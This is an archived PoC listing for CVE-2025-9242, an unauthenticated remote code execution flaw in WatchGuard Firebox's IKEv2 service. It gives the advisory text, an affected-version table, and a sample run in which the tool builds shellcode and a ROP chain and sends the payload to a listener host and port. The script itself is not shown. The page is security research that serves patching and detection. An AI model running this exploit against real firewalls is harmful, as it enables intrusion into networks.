Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-9242 PoC — WatchGuard Firebox iked Out of Bounds Write Vulnerability

Source
https://github.com/watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242
Associated Vulnerability
Title:WatchGuard Firebox iked Out of Bounds Write Vulnerability (CVE-2025-9242)
Description:An Out-of-bounds Write vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer.This vulnerability affects Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including 12.11.3 and 2025.1.
Readme
# watchTowr-vs-WatchGuard-CVE-2025-9242

Detection Artifact Generator for WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action

```
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]


[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337
```

# Description

This script attempts to detect if WatchGuard OS is vulnerable to CVE-2025-9242.

# Affected Versions

The following versions of WatchGuard OS are Affected

| Vulnerable Version              | Resolved Version         |
| ------------------------------- | ------------------------ |
| 2025.1                          | 2025.1.1                 |
| 12.x                            | 12.11.4                  |
| 12.5.x (T15 & T35 models)       | 12.5.13                  |
| 12.3.1 (FIPS-certified release) | 12.3.1_Update3 (B722811) |
| 11.x                            | End of Life              |

For more information visit [WatchGuard Firebox iked Out of Bounds Write Vulnerability](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber
File Snapshot

 [4.0K]  /data/pocs/db82b092627ef2dfda7d484c2d0315df6f642101
├── [2.5K]  README.md
└── [ 67K]  watchTowr-vs-WatchGuard-CVE-2025-9242.py

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →